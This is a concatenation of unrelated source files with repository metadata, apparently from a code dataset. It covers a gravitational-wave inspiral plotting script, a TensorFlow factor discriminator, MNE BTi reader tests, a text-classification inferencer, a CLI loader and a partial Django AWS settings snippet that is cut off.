plt.loglog(f_gw*ms.year_to_pc*3.17e-8, A*f_gw**(-7./6.) * chi**(19./4.) * (K(x, alpha)* (1. + ctild*J(x, alpha)*(1.+b_A(sp, x, alpha)) ))**(-1./2.), label=r'$\tilde{h}^{paper}$' )
plt.ylabel('h'); plt.xlabel('f')
m1 = 1e3 *ms.solar_mass_to_pc
m2 = 1. *ms.solar_mass_to_pc
D = 1e3
#sp_0 = ms.SystemProp(m1, m2, 1e3, ms.ConstHalo(0))
sp_1 = ms.SystemProp(m1, m2, halo.SpikedNFW( 2.68e-13, 23.1, 0.54, 7./3.), D)
plt.figure()
plotDiffEq(sp_1, sp_1.r_isco(), 1e7*sp_1.r_isco())
plt.legend(); plt.grid()
plt.figure()
plotPhiprimeprime(sp_1, sp_1.r_isco(), 1e5*sp_1.r_isco())
plt.legend(); plt.grid()
R0 = 100.*sp_1.r_isco()
t, R, m2 = inspiral.Classic.evolve_circular_binary(sp_1, R0, sp_1.r_isco(), acc=1e-11, accretion=True)
sp_1.m2=m2
omega_s = sp_1.omega_s(R)
plt.figure()
plotPhase(sp_1, t, R, omega_s)
plt.legend(); plt.grid()
plt.figure()
plotWaveform(sp_1, t, R, omega_s)
plt.legend(); plt.grid()
plt.figure()
plt.loglog(t, m2/ms.solar_mass_to_pc, label="$m_2$")
plt.legend(); plt.grid()
print("mass increase:", m2[-1]/m2[0] -1.)
# Now check the eccentric implementation with a tiny eccentricity, it should be very similar
a0 = 100.*sp_1.r_isco()
e0 = 0.001
sp_1.m2 = 1.*ms.solar_mass_to_pc
t2, a2, e2, m22 = inspiral.Classic.evolve_elliptic_binary(sp_1, a0, e0, sp_1.r_isco(), acc=1e-11, accretion=True)
plt.figure()
plt.loglog(t, R, label='R, cirlular')
plt.loglog(t2, a2, label='a, elliptic')
plt.loglog(t, m2, label='$m_2$, cirlular')
plt.loglog(t2, m22, label='$m_2$, elliptic')
plt.loglog(t2, e2, label='e')
plt.grid(); plt.legend()
plt.show()
| 45.380531 | 183 | 0.586291 |
81630bea6fd9bbf59bfd233fed775e2d7f455fc9 | 10,794 | py | Python | odin/bay/vi/autoencoder/factor_discriminator.py | trungnt13/odin-ai | 9c6986a854e62da39637ea463667841378b7dd84 | [
"MIT"
] | 7 | 2020-12-29T19:35:58.000Z | 2022-01-31T21:01:30.000Z | odin/bay/vi/autoencoder/factor_discriminator.py | imito/odin-ai | 9c6986a854e62da39637ea463667841378b7dd84 | [
"MIT"
] | 3 | 2020-02-06T16:44:17.000Z | 2020-09-26T05:26:14.000Z | odin/bay/vi/autoencoder/factor_discriminator.py | trungnt13/odin-ai | 9c6986a854e62da39637ea463667841378b7dd84 | [
"MIT"
] | 6 | 2019-02-14T01:36:28.000Z | 2020-10-30T13:16:32.000Z | import warnings
from typing import Any, Callable, List, Optional, Union, Sequence
import numpy as np
import tensorflow as tf
from odin.bay.layers import DistributionDense
from odin.bay.random_variable import RVconf
from odin.bay.vi.utils import permute_dims
from odin.networks import SequentialNetwork, dense_network
from odin.utils import as_tuple
from tensorflow_probability.python.distributions import (Distribution,
Independent)
from typing_extensions import Literal
class FactorDiscriminator(SequentialNetwork):
r""" The main goal is minimizing the total correlation (the mutual information
which quantifies the redundancy or dependency among latent variables).
We use a discriminator to estimate total-correlation
This class also support Semi-supervised factor discriminator, a combination
of supervised objective and total correlation estimation using density-ratio.
- 0: real sample for q(z) (or last unit in case n_outputs > 2) and
- 1: fake sample from q(z-)
If `n_outputs` > 2, suppose the number of classes is `K` then:
- 0 to K: is the classes' logits for real sample from q(z)
- K + 1: fake sample from q(z-)
This class is also extended to handle supervised loss for semi-supervised
systems.
Paramters
-----------
units : a list of Integer, the number of hidden units for each hidden layer.
n_outputs : an Integer or instance of `RVmeta`,
the number of output units and its distribution
ss_strategy : {'sum', 'logsumexp', 'mean', 'max', 'min'}.
Strategy for combining the outputs semi-supervised learning into the
logit for real sample from q(z):
- 'logsumexp' : used for semi-supervised GAN in (Salimans T. 2016)
Example
--------
```
# for FactorVAE
FactorDiscriminator(
observation=RVmeta(1, 'bernoulli', projection=True, name="ind_factors"))
# for classifier of ConditionalVAE
FactorDiscriminator(
observation=RVmeta(ds.shape, 'bernoulli', projection=True, name='image'))
```
References
------------
Kim, H., Mnih, A., 2018. "Disentangling by Factorising".
arXiv:1802.05983 [cs, stat].
Salimans, T., Goodfellow, I., Zaremba, W., et al 2016.
"Improved Techniques for Training GANs". arXiv:1606.03498 [cs.LG].
"""
def __init__(
self,
batchnorm: bool = False,
input_dropout: float = 0.,
dropout: float = 0.,
units: Sequence[int] = (1000, 1000, 1000, 1000, 1000),
observation: Union[RVconf, Sequence[RVconf]] = RVconf(1,
'bernoulli',
projection=True,
name="discriminator"),
activation: Union[
str, Callable[[tf.Tensor], tf.Tensor]] = tf.nn.leaky_relu,
ss_strategy: Literal['sum', 'logsumexp', 'mean', 'max',
'min'] = 'logsumexp',
name: str = "FactorDiscriminator",
):
if not isinstance(observation, (tuple, list)):
observation = [observation]
assert len(observation) > 0, "No output is given for FactorDiscriminator"
assert all(
isinstance(o, (RVconf, DistributionDense)) for o in observation), (
f"outputs must be instance of RVmeta, but given:{observation}")
n_outputs = 0
for o in observation:
if not o.projection:
warnings.warn(f'Projection turn off for observation {o}!')
o.event_shape = (int(np.prod(o.event_shape)),)
n_outputs += o.event_shape[0]
layers = dense_network(units=units,
batchnorm=batchnorm,
dropout=dropout,
flatten_inputs=True,
input_dropout=input_dropout,
activation=activation,
prefix=name)
super().__init__(layers, name=name)
self.ss_strategy = str(ss_strategy)
self.observation = observation
self.n_outputs = n_outputs
self._distributions = []
assert self.ss_strategy in {'sum', 'logsumexp', 'mean', 'max', 'min'}
def build(self, input_shape=None):
super().build(input_shape)
shape = self.output_shape[1:]
self._distributions = [
o.create_posterior(shape) if isinstance(o, RVconf) else o
for o in self.observation
]
self.input_ndim = len(self.input_shape) - 1
return self
def call(self, inputs, **kwargs):
if isinstance(inputs, (tuple, list)) and len(inputs) == 1:
inputs = inputs[0]
outputs = super().call(inputs, **kwargs)
# project into different output distributions
distributions = [d(outputs, **kwargs) for d in self.distributions]
return distributions[0] if len(distributions) == 1 else tuple(distributions)
def _to_samples(self, qz_x, mean=False, stop_grad=False):
qz_x = tf.nest.flatten(qz_x)
if mean:
z = tf.concat([q.mean() for q in qz_x], axis=-1)
else:
z = tf.concat([tf.convert_to_tensor(q) for q in qz_x], axis=-1)
z = tf.reshape(z, tf.concat([(-1,), z.shape[-self.input_ndim:]], axis=0))
if stop_grad:
z = tf.stop_gradient(z)
return z
def _tc_logits(self, logits):
# use ss_strategy to infer appropriate logits value for
# total-correlation estimator (logits for q(z)) in case of n_outputs > 1
Xs = []
for x in tf.nest.flatten(logits):
if isinstance(x, Distribution):
if isinstance(x, Independent):
x = x.distribution
if hasattr(x, 'logits'):
x = x.logits
elif hasattr(x, 'concentration'):
x = x.concentration
else:
raise RuntimeError(
f"Distribution {x} doesn't has 'logits' or 'concentration' "
"attributes, cannot not be used for estimating total correlation."
)
Xs.append(x)
# concatenate the outputs
if len(Xs) == 0:
raise RuntimeError(
f"No logits values found for total correlation: {logits}")
elif len(Xs) == 1:
Xs = Xs[0]
else:
Xs = tf.concat(Xs, axis=-1)
# only 1 unit, only estimate TC
if self.n_outputs == 1:
return Xs[..., 0]
# multiple units, reduce
return getattr(tf, 'reduce_%s' % self.ss_strategy)(Xs, axis=-1)
def total_correlation(self,
qz_x: Distribution,
training: Optional[bool] = None) -> tf.Tensor:
r""" Total correlation Eq(3)
```
TC(z) = KL(q(z)||q(z-)) = E_q(z)[log(q(z) / q(z-))]
~ E_q(z)[ log(D(z)) - log(1 - D(z)) ]
```
We want to minimize the total correlation to achieve factorized latent units
Note:
In many implementation, `log(q(z-)) - log(q(z))` is referred as `total
correlation loss`, here, we return `log(q(z)) - log(q(z-))` as the total
correlation for the construction of the ELBO in Eq(2)
Arguments:
qz_x : a Tensor, [batch_dim, latent_dim] or Distribution
Return:
TC(z) : a scalar, approximation of the density-ratio that arises in the
KL-term.
"""
z = self._to_samples(qz_x, stop_grad=False)
logits = self(z, training=training)
logits = self._tc_logits(logits)
# in case using sigmoid, other implementation use -logits here but it
# should be logits.
# if it is negative here, TC is reduce, but reasonably, it must be positive (?)
return tf.reduce_mean(logits)
def dtc_loss(self,
qz_x: Distribution,
qz_xprime: Optional[Distribution] = None,
training: Optional[bool] = None) -> tf.Tensor:
r""" Discriminated total correlation loss Algorithm(2)
Minimize the probability of:
- `q(z)` misclassified as `D(z)[:, 0]`
- `q(z')` misclassified as `D(z')[:, 1]`
Arguments:
qz_x : `Tensor` or `Distribution`.
Samples of the latents from first batch
qz_xprime : `Tensor` or `Distribution` (optional).
Samples of the latents from second batch, this will be permuted.
If not given, then reuse `qz_x`.
Return:
scalar - loss value for training the discriminator
"""
# we don't want the gradient to be propagated to the encoder
z = self._to_samples(qz_x, stop_grad=True)
z_logits = self._tc_logits(self(z, training=training))
# using log_softmax function give more numerical stabalized results than
# logsumexp yourself.
d_z = -tf.math.log_sigmoid(z_logits) # must be negative here
# for X_prime
if qz_xprime is not None:
z = self._to_samples(qz_xprime, stop_grad=True)
z_perm = permute_dims(z)
zperm_logits = self._tc_logits(self(z_perm, training=training))
d_zperm = -tf.math.log_sigmoid(zperm_logits) # also negative here
# reduce the negative of d_z, and the positive of d_zperm
# this equal to cross_entropy(d_z, zeros) + cross_entropy(d_zperm, ones)
loss = 0.5 * (tf.reduce_mean(d_z) + tf.reduce_mean(zperm_logits + d_zperm))
return loss
def supervised_loss(self,
labels: Union[tf.Tensor, List[tf.Tensor]],
qz_x: Distribution,
mean: bool = False,
mask: Optional[tf.Tensor] = None,
training: Optional[bool] = None) -> tf.Tensor:
labels = as_tuple(labels)
z = self._to_samples(qz_x, mean=mean, stop_grad=True)
distributions = as_tuple(self(z, training=training))
## applying the mask (1-labelled, 0-unlabelled)
if mask is not None:
mask = tf.reshape(mask, (-1,))
# labels = [tf.boolean_mask(y, mask, axis=0) for y in labels]
# z_logits = tf.boolean_mask(z_logits, mask, axis=0)
## calculate the loss
loss = 0.
for dist, y_true in zip(distributions, labels):
llk = dist.log_prob(y_true)
# check the mask careful here
# if no data for labels, just return 0
if mask is not None:
llk = tf.cond(tf.reduce_all(tf.logical_not(mask)), lambda: 0.,
lambda: tf.boolean_mask(llk, mask, axis=0))
# negative log-likelihood here
loss += -llk
# check non-zero, if zero the gradient must be stop or NaN gradient happen
loss = tf.reduce_mean(loss)
loss = tf.cond(
tf.abs(loss) < 1e-8, lambda: tf.stop_gradient(loss), lambda: loss)
return loss
@property
def n_observation(self) -> int:
return len(self.observation)
@property
def distributions(self) -> List[DistributionDense]:
return self._distributions
@property
def prior(self) -> List[Distribution]:
return [d.prior for d in self._distributions]
def __str__(self):
s = super().__str__()
s1 = ['\n Outputs:']
for i, d in enumerate(self.distributions):
s1.append(f' [{i}]{d}')
return s + '\n'.join(s1)
| 37.741259 | 83 | 0.626089 |
2c5ba8347f7943822934181859ccece4355cd9dd | 11,903 | py | Python | mne/io/bti/tests/test_bti.py | mvdoc/mne-python | bac50dd08361b10d0a65c614ea2de06308750411 | [
"BSD-3-Clause"
] | null | null | null | mne/io/bti/tests/test_bti.py | mvdoc/mne-python | bac50dd08361b10d0a65c614ea2de06308750411 | [
"BSD-3-Clause"
] | null | null | null | mne/io/bti/tests/test_bti.py | mvdoc/mne-python | bac50dd08361b10d0a65c614ea2de06308750411 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import print_function
# Authors: Denis Engemann <denis.engemann@gmail.com>
#
# License: BSD (3-clause)
import os
import os.path as op
from functools import reduce, partial
import warnings
import numpy as np
from numpy.testing import (assert_array_almost_equal, assert_array_equal,
assert_allclose)
from nose.tools import assert_true, assert_raises, assert_equal
from mne.io import read_raw_fif, read_raw_bti
from mne.io.bti.bti import (_read_config, _process_bti_headshape,
_read_bti_header, _get_bti_dev_t,
_correct_trans, _get_bti_info)
from mne.io.tests.test_raw import _test_raw_reader
from mne.tests.common import assert_dig_allclose
from mne.io.pick import pick_info
from mne.io.constants import FIFF
from mne import pick_types
from mne.utils import run_tests_if_main, slow_test
from mne.transforms import Transform, combine_transforms, invert_transform
from mne.externals import six
warnings.simplefilter('always')
base_dir = op.join(op.abspath(op.dirname(__file__)), 'data')
archs = 'linux', 'solaris'
pdf_fnames = [op.join(base_dir, 'test_pdf_%s' % a) for a in archs]
config_fnames = [op.join(base_dir, 'test_config_%s' % a) for a in archs]
hs_fnames = [op.join(base_dir, 'test_hs_%s' % a) for a in archs]
exported_fnames = [op.join(base_dir, 'exported4D_%s_raw.fif' % a)
for a in archs]
tmp_raw_fname = op.join(base_dir, 'tmp_raw.fif')
# the 4D exporter doesn't export all channels, so we confine our comparison
NCH = 248
def test_read_config():
"""Test read bti config file."""
# for config in config_fname, config_solaris_fname:
for config in config_fnames:
cfg = _read_config(config)
assert_true(all('unknown' not in block.lower() and block != ''
for block in cfg['user_blocks']))
def test_crop_append():
"""Test crop and append raw."""
raw = _test_raw_reader(
read_raw_bti, pdf_fname=pdf_fnames[0],
config_fname=config_fnames[0], head_shape_fname=hs_fnames[0])
y, t = raw[:]
t0, t1 = 0.25 * t[-1], 0.75 * t[-1]
mask = (t0 <= t) * (t <= t1)
raw_ = raw.copy().crop(t0, t1)
y_, _ = raw_[:]
assert_true(y_.shape[1] == mask.sum())
assert_true(y_.shape[0] == y.shape[0])
def test_transforms():
"""Test transformations."""
bti_trans = (0.0, 0.02, 0.11)
bti_dev_t = Transform('ctf_meg', 'meg', _get_bti_dev_t(0.0, bti_trans))
for pdf, config, hs, in zip(pdf_fnames, config_fnames, hs_fnames):
raw = read_raw_bti(pdf, config, hs, preload=False)
dev_ctf_t = raw.info['dev_ctf_t']
dev_head_t_old = raw.info['dev_head_t']
ctf_head_t = raw.info['ctf_head_t']
# 1) get BTI->Neuromag
bti_dev_t = Transform('ctf_meg', 'meg', _get_bti_dev_t(0.0, bti_trans))
# 2) get Neuromag->BTI head
t = combine_transforms(invert_transform(bti_dev_t), dev_ctf_t,
'meg', 'ctf_head')
# 3) get Neuromag->head
dev_head_t_new = combine_transforms(t, ctf_head_t, 'meg', 'head')
assert_array_equal(dev_head_t_new['trans'], dev_head_t_old['trans'])
@slow_test
def test_raw():
"""Test bti conversion to Raw object."""
for pdf, config, hs, exported in zip(pdf_fnames, config_fnames, hs_fnames,
exported_fnames):
# rx = 2 if 'linux' in pdf else 0
assert_raises(ValueError, read_raw_bti, pdf, 'eggs', preload=False)
assert_raises(ValueError, read_raw_bti, pdf, config, 'spam',
preload=False)
if op.exists(tmp_raw_fname):
os.remove(tmp_raw_fname)
ex = read_raw_fif(exported, preload=True)
ra = read_raw_bti(pdf, config, hs, preload=False)
assert_true('RawBTi' in repr(ra))
assert_equal(ex.ch_names[:NCH], ra.ch_names[:NCH])
assert_array_almost_equal(ex.info['dev_head_t']['trans'],
ra.info['dev_head_t']['trans'], 7)
assert_dig_allclose(ex.info, ra.info)
coil1, coil2 = [np.concatenate([d['loc'].flatten()
for d in r_.info['chs'][:NCH]])
for r_ in (ra, ex)]
assert_array_almost_equal(coil1, coil2, 7)
loc1, loc2 = [np.concatenate([d['loc'].flatten()
for d in r_.info['chs'][:NCH]])
for r_ in (ra, ex)]
assert_allclose(loc1, loc2)
assert_allclose(ra[:NCH][0], ex[:NCH][0])
assert_array_equal([c['range'] for c in ra.info['chs'][:NCH]],
[c['range'] for c in ex.info['chs'][:NCH]])
assert_array_equal([c['cal'] for c in ra.info['chs'][:NCH]],
[c['cal'] for c in ex.info['chs'][:NCH]])
assert_array_equal(ra._cals[:NCH], ex._cals[:NCH])
# check our transforms
for key in ('dev_head_t', 'dev_ctf_t', 'ctf_head_t'):
if ex.info[key] is None:
pass
else:
assert_true(ra.info[key] is not None)
for ent in ('to', 'from', 'trans'):
assert_allclose(ex.info[key][ent],
ra.info[key][ent])
ra.save(tmp_raw_fname)
re = read_raw_fif(tmp_raw_fname)
print(re)
for key in ('dev_head_t', 'dev_ctf_t', 'ctf_head_t'):
assert_true(isinstance(re.info[key], dict))
this_t = re.info[key]['trans']
assert_equal(this_t.shape, (4, 4))
# cehck that matrix by is not identity
assert_true(not np.allclose(this_t, np.eye(4)))
os.remove(tmp_raw_fname)
def test_info_no_rename_no_reorder_no_pdf():
"""Test private renaming, reordering and partial construction option."""
for pdf, config, hs in zip(pdf_fnames, config_fnames, hs_fnames):
info, bti_info = _get_bti_info(
pdf_fname=pdf, config_fname=config, head_shape_fname=hs,
rotation_x=0.0, translation=(0.0, 0.02, 0.11), convert=False,
ecg_ch='E31', eog_ch=('E63', 'E64'),
rename_channels=False, sort_by_ch_name=False)
info2, bti_info = _get_bti_info(
pdf_fname=None, config_fname=config, head_shape_fname=hs,
rotation_x=0.0, translation=(0.0, 0.02, 0.11), convert=False,
ecg_ch='E31', eog_ch=('E63', 'E64'),
rename_channels=False, sort_by_ch_name=False)
assert_equal(info['ch_names'],
[ch['ch_name'] for ch in info['chs']])
assert_equal([n for n in info['ch_names'] if n.startswith('A')][:5],
['A22', 'A2', 'A104', 'A241', 'A138'])
assert_equal([n for n in info['ch_names'] if n.startswith('A')][-5:],
['A133', 'A158', 'A44', 'A134', 'A216'])
info = pick_info(info, pick_types(info, meg=True, stim=True,
resp=True))
info2 = pick_info(info2, pick_types(info2, meg=True, stim=True,
resp=True))
assert_true(info['sfreq'] is not None)
assert_true(info['lowpass'] is not None)
assert_true(info['highpass'] is not None)
assert_true(info['meas_date'] is not None)
assert_equal(info2['sfreq'], None)
assert_equal(info2['lowpass'], None)
assert_equal(info2['highpass'], None)
assert_equal(info2['meas_date'], None)
assert_equal(info['ch_names'], info2['ch_names'])
assert_equal(info['ch_names'], info2['ch_names'])
for key in ['dev_ctf_t', 'dev_head_t', 'ctf_head_t']:
assert_array_equal(info[key]['trans'], info2[key]['trans'])
assert_array_equal(
np.array([ch['loc'] for ch in info['chs']]),
np.array([ch['loc'] for ch in info2['chs']]))
# just check reading data | corner case
raw1 = read_raw_bti(
pdf_fname=pdf, config_fname=config, head_shape_fname=None,
sort_by_ch_name=False, preload=True)
# just check reading data | corner case
raw2 = read_raw_bti(
pdf_fname=pdf, config_fname=config, head_shape_fname=None,
rename_channels=False,
sort_by_ch_name=True, preload=True)
sort_idx = [raw1.bti_ch_labels.index(ch) for ch in raw2.bti_ch_labels]
raw1._data = raw1._data[sort_idx]
assert_array_equal(raw1._data, raw2._data)
assert_array_equal(raw2.bti_ch_labels, raw2.ch_names)
def test_no_conversion():
"""Test bti no-conversion option."""
get_info = partial(
_get_bti_info,
rotation_x=0.0, translation=(0.0, 0.02, 0.11), convert=False,
ecg_ch='E31', eog_ch=('E63', 'E64'),
rename_channels=False, sort_by_ch_name=False)
for pdf, config, hs in zip(pdf_fnames, config_fnames, hs_fnames):
raw_info, _ = get_info(pdf, config, hs, convert=False)
raw_info_con = read_raw_bti(
pdf_fname=pdf, config_fname=config, head_shape_fname=hs,
convert=True, preload=False).info
pick_info(raw_info_con,
pick_types(raw_info_con, meg=True, ref_meg=True),
copy=False)
pick_info(raw_info,
pick_types(raw_info, meg=True, ref_meg=True), copy=False)
bti_info = _read_bti_header(pdf, config)
dev_ctf_t = _correct_trans(bti_info['bti_transform'][0])
assert_array_equal(dev_ctf_t, raw_info['dev_ctf_t']['trans'])
assert_array_equal(raw_info['dev_head_t']['trans'], np.eye(4))
assert_array_equal(raw_info['ctf_head_t']['trans'], np.eye(4))
dig, t = _process_bti_headshape(hs, convert=False, use_hpi=False)
assert_array_equal(t['trans'], np.eye(4))
for ii, (old, new, con) in enumerate(zip(
dig, raw_info['dig'], raw_info_con['dig'])):
assert_equal(old['ident'], new['ident'])
assert_array_equal(old['r'], new['r'])
assert_true(not np.allclose(old['r'], con['r']))
if ii > 10:
break
ch_map = dict((ch['chan_label'],
ch['loc']) for ch in bti_info['chs'])
for ii, ch_label in enumerate(raw_info['ch_names']):
if not ch_label.startswith('A'):
continue
t1 = ch_map[ch_label] # correction already performed in bti_info
t2 = raw_info['chs'][ii]['loc']
t3 = raw_info_con['chs'][ii]['loc']
assert_allclose(t1, t2, atol=1e-15)
assert_true(not np.allclose(t1, t3))
idx_a = raw_info_con['ch_names'].index('MEG 001')
idx_b = raw_info['ch_names'].index('A22')
assert_equal(
raw_info_con['chs'][idx_a]['coord_frame'],
FIFF.FIFFV_COORD_DEVICE)
assert_equal(
raw_info['chs'][idx_b]['coord_frame'],
FIFF.FIFFV_MNE_COORD_4D_HEAD)
def test_bytes_io():
"""Test bti bytes-io API."""
for pdf, config, hs in zip(pdf_fnames, config_fnames, hs_fnames):
raw = read_raw_bti(pdf, config, hs, convert=True, preload=False)
with open(pdf, 'rb') as fid:
pdf = six.BytesIO(fid.read())
with open(config, 'rb') as fid:
config = six.BytesIO(fid.read())
with open(hs, 'rb') as fid:
hs = six.BytesIO(fid.read())
raw2 = read_raw_bti(pdf, config, hs, convert=True, preload=False)
repr(raw2)
assert_array_equal(raw[:][0], raw2[:][0])
def test_setup_headshape():
"""Test reading bti headshape."""
for hs in hs_fnames:
dig, t = _process_bti_headshape(hs)
expected = set(['kind', 'ident', 'r'])
found = set(reduce(lambda x, y: list(x) + list(y),
[d.keys() for d in dig]))
assert_true(not expected - found)
run_tests_if_main()
| 40.763699 | 79 | 0.598925 |
ee2c5a4ca0335fd4df6a6c96f0bf2e837077db6b | 4,974 | py | Python | examples/tensorflow/inference/text-classification-ch/code/txt_cnn_rnn_inference.py | FinchZHU/uai-sdk | 78e06bebba2d18233ce6dcb5be619e940f7a7ef3 | [
"Apache-2.0"
] | 38 | 2017-04-26T04:00:09.000Z | 2022-02-10T02:51:05.000Z | examples/tensorflow/inference/text-classification-ch/code/txt_cnn_rnn_inference.py | FinchZHU/uai-sdk | 78e06bebba2d18233ce6dcb5be619e940f7a7ef3 | [
"Apache-2.0"
] | 17 | 2017-11-20T20:47:09.000Z | 2022-02-09T23:48:46.000Z | examples/tensorflow/inference/text-classification-ch/code/txt_cnn_rnn_inference.py | FinchZHU/uai-sdk | 78e06bebba2d18233ce6dcb5be619e940f7a7ef3 | [
"Apache-2.0"
] | 28 | 2017-07-08T05:23:13.000Z | 2020-08-18T03:12:27.000Z | # Copyright 2017 The UAI-SDK Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A text classification cnn/rnn inferencer.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
from PIL import Image
import numpy as np
import tensorflow as tf
import tensorflow.contrib.keras as kr
from cnn_model import TCNNConfig, TextCNN
from rnn_model import TRNNConfig, TextRNN
from cnews_loader import read_vocab, read_category
from uai.arch.tf_model import TFAiUcloudModel
if sys.version_info[0] > 2:
is_py3 = True
else:
reload(sys)
sys.setdefaultencoding("utf-8")
is_py3 = False
class TxtClassModel(TFAiUcloudModel):
""" TxtClass example model
"""
def __init__(self, conf):
super(TxtClassModel, self).__init__(conf)
def load_model(self):
pass
def preprocess(self, data):
return data.body
def execute(self, data, batch_size):
pass
class TxtClassCNNModel(TxtClassModel):
""" TxtClass example model
"""
def __init__(self, conf):
super(TxtClassCNNModel, self).__init__(conf)
def load_model(self):
sess = tf.Session()
print('Configuring CNN model...')
config = TCNNConfig()
cnn_model = TextCNN(config)
saver = tf.train.Saver()
params_file = tf.train.latest_checkpoint(self.model_dir)
saver.restore(sess, params_file)
categories, cat_to_id = read_category()
vocab_dir = 'cnews/cnews.vocab.txt'
words, word_to_id = read_vocab(vocab_dir)
self.words = words
self.word_to_id = word_to_id
self.categories = categories
self.cat_to_id = cat_to_id
self.cnn_model = cnn_model
self.sess = sess
print(self.cnn_model)
print(self.sess)
def native_content(self, content):
if not is_py3:
return content.decode('utf-8')
else:
return content
def execute(self, data, batch_size):
contents, labels = [], []
ret = [None] * batch_size
for i in range(batch_size):
line = self.preprocess(data[i])
contents.append(list(self.native_content(line)))
data_id = []
for i in range(len(contents)):
data_id.append([self.word_to_id[x] for x in contents[i] if x in self.word_to_id])
x_pad = kr.preprocessing.sequence.pad_sequences(data_id, 600)
print(self.cnn_model)
print(self.sess)
feed_dict = {
self.cnn_model.input_x: x_pad,
self.cnn_model.keep_prob: 1.0
}
results = self.sess.run(self.cnn_model.y_pred_cls, feed_dict=feed_dict)
i = 0
for res in results:
if ret[i] != None:
i=i+1
continue
ret[i] = self.categories[res]
i=i+1
return ret
class TxtClassRNNModel(TxtClassModel):
""" TxtClass example model
"""
def __init__(self, conf):
super(TxtClassRNNModel, self).__init__(conf)
def load_model(self):
sess = tf.Session()
print('Configuring CNN model...')
config = TRNNConfig()
cnn_model = TextRNN(config)
saver = tf.train.Saver()
params_file = tf.train.latest_checkpoint(self.model_dir)
saver.restore(sess, params_file)
categories, cat_to_id = read_category()
vocab_dir = 'cnews/cnews.vocab.txt'
words, word_to_id = read_vocab(vocab_dir)
self.words = words
self.word_to_id = word_to_id
self.categories = categories
self.cat_to_id = cat_to_id
self.cnn_model = cnn_model
self.sess = sess
print(self.cnn_model)
print(self.sess)
def native_content(self, content):
if not is_py3:
return content.decode('utf-8')
else:
return content
def execute(self, data, batch_size):
contents, labels = [], []
ret = [None] * batch_size
for i in range(batch_size):
line = self.preprocess(data[i])
contents.append(list(self.native_content(line)))
data_id= []
for i in range(len(contents)):
data_id.append([self.word_to_id[x] for x in contents[i] if x in self.word_to_id])
x_pad = kr.preprocessing.sequence.pad_sequences(data_id, 600)
print(self.cnn_model)
print(self.sess)
feed_dict = {
self.cnn_model.input_x: x_pad,
self.cnn_model.keep_prob: 1.0
}
results = self.sess.run(self.cnn_model.y_pred_cls, feed_dict=feed_dict)
i = 0
for res in results:
if ret[i] != None:
i=i+1
continue
ret[i] = self.categories[res]
i=i+1
return ret
| 24.994975 | 87 | 0.674507 |
215e104c08bebb62fff7b125bf9ae814fc4734c7 | 2,477 | py | Python | msgraph-cli-extensions/v1_0/usersfunctions_v1_0/azext_usersfunctions_v1_0/__init__.py | thewahome/msgraph-cli | 33127d9efa23a0e5f5303c93242fbdbb73348671 | [
"MIT"
] | null | null | null | msgraph-cli-extensions/v1_0/usersfunctions_v1_0/azext_usersfunctions_v1_0/__init__.py | thewahome/msgraph-cli | 33127d9efa23a0e5f5303c93242fbdbb73348671 | [
"MIT"
] | null | null | null | msgraph-cli-extensions/v1_0/usersfunctions_v1_0/azext_usersfunctions_v1_0/__init__.py | thewahome/msgraph-cli | 33127d9efa23a0e5f5303c93242fbdbb73348671 | [
"MIT"
] | null | null | null | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msgraph.cli.core import AzCommandsLoader
from azext_usersfunctions_v1_0.generated._help import helps # pylint: disable=unused-import
try:
from azext_usersfunctions_v1_0.manual._help import helps # pylint: disable=reimported
except ImportError as e:
if e.name.endswith('manual._help'):
pass
else:
raise e
class UsersFunctionsCommandsLoader(AzCommandsLoader):
def __init__(self, cli_ctx=None):
from msgraph.cli.core.commands import CliCommandType
from azext_usersfunctions_v1_0.generated._client_factory import cf_usersfunctions_v1_0_cl
usersfunctions_v1_0_custom = CliCommandType(
operations_tmpl='azext_usersfunctions_v1_0.custom#{}',
client_factory=cf_usersfunctions_v1_0_cl)
parent = super(UsersFunctionsCommandsLoader, self)
parent.__init__(cli_ctx=cli_ctx, custom_command_type=usersfunctions_v1_0_custom)
def load_command_table(self, args):
from azext_usersfunctions_v1_0.generated.commands import load_command_table
load_command_table(self, args)
try:
from azext_usersfunctions_v1_0.manual.commands import load_command_table as load_command_table_manual
load_command_table_manual(self, args)
except ImportError as e:
if e.name.endswith('manual.commands'):
pass
else:
raise e
return self.command_table
def load_arguments(self, command):
from azext_usersfunctions_v1_0.generated._params import load_arguments
load_arguments(self, command)
try:
from azext_usersfunctions_v1_0.manual._params import load_arguments as load_arguments_manual
load_arguments_manual(self, command)
except ImportError as e:
if e.name.endswith('manual._params'):
pass
else:
raise e
COMMAND_LOADER_CLS = UsersFunctionsCommandsLoader
| 41.283333 | 114 | 0.656036 |
613ad19cafaf9e4be28fc4a62e1dafa5ad488c82 | 1,187 | py | Python | docs/partial-settings.py | alexisbellido/znbstatic | ad20160c43ab33504dfb67007d6e93ced522a77f | [
"BSD-3-Clause"
] | null | null | null | docs/partial-settings.py | alexisbellido/znbstatic | ad20160c43ab33504dfb67007d6e93ced522a77f | [
"BSD-3-Clause"
] | 8 | 2019-12-04T22:18:20.000Z | 2021-09-22T17:48:33.000Z | docs/partial-settings.py | alexisbellido/znbstatic | ad20160c43ab33504dfb67007d6e93ced522a77f | [
"BSD-3-Clause"
] | null | null | null | # Add the following settings to your Django project's settings.py.
# AWS S3 settings common to static and media files
AWS_ACCESS_KEY_ID = CONFIG['aws']['s3_static']['AWS_ACCESS_KEY_ID']
AWS_SECRET_ACCESS_KEY = CONFIG['aws']['s3_static']['AWS_SECRET_ACCESS_KEY']
AWS_S3_HOST = 's3.amazonaws.com'
AWS_IS_GZIPPED = True
S3_USE_SIGV4 = True
AWS_QUERYSTRING_AUTH = False
AWS_DEFAULT_ACL = 'public-read'
# Headers' names written without dashes for AWS and Boto3.
AWS_S3_OBJECT_PARAMETERS = {
